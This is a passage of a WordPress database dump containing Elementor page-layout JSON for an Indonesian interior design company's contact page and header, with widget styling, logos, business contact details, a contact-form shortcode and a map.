(000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4589,4980,'_elementor_page_assets','a:0:{}'),(4590,4980,'_elementor_pro_version','3.8.1'),(4591,4980,'_elementor_css','a:6:{s:4:\"time\";i:1695718921;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:7:\"ovaicon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4592,4981,'_wp_page_template','elementor_header_footer'),(4593,4981,'_elementor_edit_mode','builder'),(4594,4981,'_elementor_template_type','wp-page'),(4595,4981,'_elementor_version','3.8.1'),(4596,4981,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Saatnya Impian Anda Menjadi Kenyataan!\",\"description\":\"Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini temukan clarity kebutuhan kenyamanan Anda dan mulailah perjalanan menuju interior yang menginspirasi!\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4597,4981,'_elementor_page_assets','a:0:{}'),(4598,4981,'_elementor_pro_version','3.8.1'),(4599,4981,'_elementor_css','a:6:{s:4:\"time\";i:1695718921;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:7:\"ovaicon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4600,40,'_elementor_css','a:6:{s:4:\"time\";i:1695734459;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:7:\"ovaicon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4601,4982,'_wp_page_template','default'),(4602,4982,'_elementor_edit_mode','builder'),(4603,4982,'_elementor_template_type','wp-post'),(4604,4982,'_elementor_version','3.8.1'),(4605,4982,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":569,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4606,4982,'_elementor_page_assets','a:0:{}'),(4607,4982,'_elementor_pro_version','3.8.1'),(4608,4982,'_elementor_css','a:6:{s:4:\"time\";i:1695636515;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4610,4983,'_wp_page_template','default'),(4611,4983,'_elementor_edit_mode','builder'),(4612,4983,'_elementor_template_type','wp-post'),(4613,4983,'_elementor_version','3.8.1'),(4614,4983,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-heade